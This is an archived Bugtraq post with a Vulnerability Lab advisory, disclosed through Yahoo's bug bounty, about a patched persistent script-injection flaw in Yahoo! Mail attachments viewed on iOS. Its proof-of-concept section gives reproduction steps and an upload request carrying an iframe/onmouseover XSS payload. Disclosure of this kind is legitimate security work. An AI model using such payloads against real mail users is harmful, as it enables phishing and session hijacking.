Home page logo
/

bugtraq logo Bugtraq mailing list archives

Yahoo! Bug Bounty #30 YM - Application-Side Mail Encoding (File Attachment) Vulnerability
From: Vulnerability Lab <research () vulnerability-lab com>
Date: Thu, 10 Jul 2014 14:51:09 +0200

Document Title:
===============
Yahoo! Bug Bounty #30 YM - Application-Side Mail Encoding (File Attachment) Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1137


Release Date:
=============
2014-07-08


Vulnerability Laboratory ID (VL-ID):
====================================
1137


Common Vulnerability Scoring System:
====================================
5.3


Product & Service Introduction:
===============================
Yahoo! Inc. is an American multinational internet corporation headquartered in Sunnyvale, California. It is widely 
known for its web portal, search engine Yahoo! Search, and related services, including Yahoo! Directory, Yahoo! Mail, 
Yahoo! News, Yahoo! Finance, Yahoo! Groups, Yahoo! Answers, advertising, online mapping, video sharing, fantasy sports 
and its social media website. It is one of the most popular sites in the United States. According to news sources, 
roughly 700 million people visit Yahoo! websites every month. Yahoo! itself claims it attracts `more than half a 
billion consumers every month in more than 30 languages.

(Copy of the Vendor Homepage: http://www.yahoo.com )


Abstract Advisory Information:
==============================
The Vulnerability-Laboratory Research Team has discovered a persistent input validation vulnerability in the official 
Yahoo! Mail Service web-application.


Vulnerability Disclosure Timeline:
==================================
2013-11-08:     Researcher Notification & Coordination (Ateeq ur Rehman Khan - Core Research Team)
2013-11-09:     Vendor Notification (Yahoo! Security Team - Bug Bounty Program)
2014-02-18:     Vendor Response/Feedback (Yahoo! Security Team - Bug Bounty Program)
2014-06-01:     Vendor Fix/Patch (Yahoo! Developer Team - Reward: HackerOne Program)
2014-07-08:     Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Yahoo!
Product: Yahoo! Mail - Web Application & API 2013 Q3


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent script code inject web vulnerability has been discovered in the official Yahoo Mail Service 
web-application & API. 
The vulnerability affects the Yahoo Mail Mobile Application for iPhone, iPad and iPod touch. The vulnerability allows 
attackers 
to upload / attach own malicious .html files and send them to other Yahoo users.

During the testing, it was discovered that using Yahoo mail, it is possible to include malicious script code within 
.html files 
and send them as attachments to other users. It seems that the application is not performing proper validation When 
uploading 
user attached files. Upon viewing these attached files from your iphone/ipad device, the malicious script code gets 
executed 
directly hence leaving the victims vulnerable to persistent client side attacks.

The security risk of the persistent web vulnerability is estimated as medium with a cvss (common vulnerability scoring 
system) 
count of 5.3. Exploitation of this vulnerability requires low user interaction. Successful exploitation of this 
vulnerability 
results in persistent phishing, persistent client side redirects, user session hijacking and similar client side 
attacks.

Request Method(s):
                                [+] POST

Vulnerable Application(s):
                                [+] Yahoo! Mail - Web Application

Vulnerable Module(s): 
                                [+] Compose Mail > File Attachments

Vulnerable Parameter(s):
                                [+] Attach File


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged yahoo web 
application 
account and low user interaction. For security demonstration or to reproduce the vulnerability follow the provided 
information 
and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Register an yahoo mail account and login to the account system
2. Open the `compose a New Yahoo email` section
3. Click the `attach file` button in the compose mail section
4. Attach the POC.html file provided along with this advisory
5. Send out the email with the malicious test attachment to another yahoo test account 
6. Using your iPad/iPhone device, click on the attachment link of the newly received POC email
7. You should now see an iframe with vulnerability labs website proving the existence of this vulnerability
8. Successful reproduce of the yahoo mail service vulnerability!


--- PoC Session Logs ---
POST /us.f1624.mail.yahoo.com/ya/upload_with_cred?output=php&cred=Encrypted HTTP/1.1
Host: bf1-attach.mail.yahoo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://us-mg6.mail.yahoo.com/neo/launch?.rand=7sd8nun2neu5c
Content-Length: 561
Content-Type: multipart/form-data; boundary=---------------------------234701259230567
Origin: http://us-mg6.mail.yahoo.com
Cookie: Hidden
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
-----------------------------234701259230567
Content-Disposition: form-data; name="filename
POC.html
-----------------------------234701259230567
Content-Disposition: form-data; name="filesize"
120
-----------------------------234701259230567
Content-Disposition: form-data; name="Filedata"; filename="POC.html"
Content-Type: text/html
'%3d'>"><iframe src='http://www.vulnerability-lab.com&apos; onmouseover=alert(document.cookie)></iframe>/927
"><h1>Testing POC Ateeq
-----------------------------234701259230567

Response:
HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: http://us-mg6.mail.yahoo.com
Cache-Control: private
Connection: Keep-Alive
Content-Length: 322
Content-Type: text/xml
Date: Fri, 08 Nov 2013 19:12:53 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml";, CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi 
IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Server: HTTP/1.1 UserFiberFramework/1.0 
Vary: Accept-Encoding
Via: HTTP/1.1 r03.ycpi.ac4.yahoo.net UserFiberFramework/1.0 

<?xml version="1.0" encoding="UTF-8"?><Response>  <attachment>    <code>uploadAVNoVirus</code>    
<id>e2fd91b75b55018624eef056c5913b0f</id>    <name>POC.html</name>    <type>text/html</type>    
<size>126</size>  </attachment></Response><!-- web162405.mail.bf1.yahoo.com compressed/chunked Fri Nov  8 11:12:53 PST 
2013


Reference(s):
https://mail.yahoo.com


Solution - Fix & Patch:
=======================
Proper security controls should be implemented/enforced in the file attachment module to validate inputs and to 
persistent script code executions.


Security Risk:
==============
The security risk of persistent input validation web vulnerability in the yahoo mail service application is estimated 
as medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq ur Rehman Khan (ateeq () evolution-sec com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all 
warranties, either 
expressed or implied, including the warranties of merchantability and capability for a particular purpose. 
Vulnerability-Lab or its suppliers 
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or 
special damages, even 
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow 
the exclusion or limitation 
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or 
encourage anybody to break 
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - 
www.evolution-sec.com
Contact:    admin () vulnerability-lab com      - research () vulnerability-lab com                     - admin () 
evolution-sec com
Section:    dev.vulnerability-db.com            - forum.vulnerability-db.com                            - 
magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - 
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - 
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability 
Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other 
information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit 
our material contact 
(admin () vulnerability-lab com or research () vulnerability-lab com) to get a permission.

                                Copyright © 2014 | Vulnerability Laboratory [Evolution Security]


-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research () vulnerability-lab com



  By Date           By Thread  

Current thread:
  • Yahoo! Bug Bounty #30 YM - Application-Side Mail Encoding (File Attachment) Vulnerability Vulnerability Lab (Jul 10)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault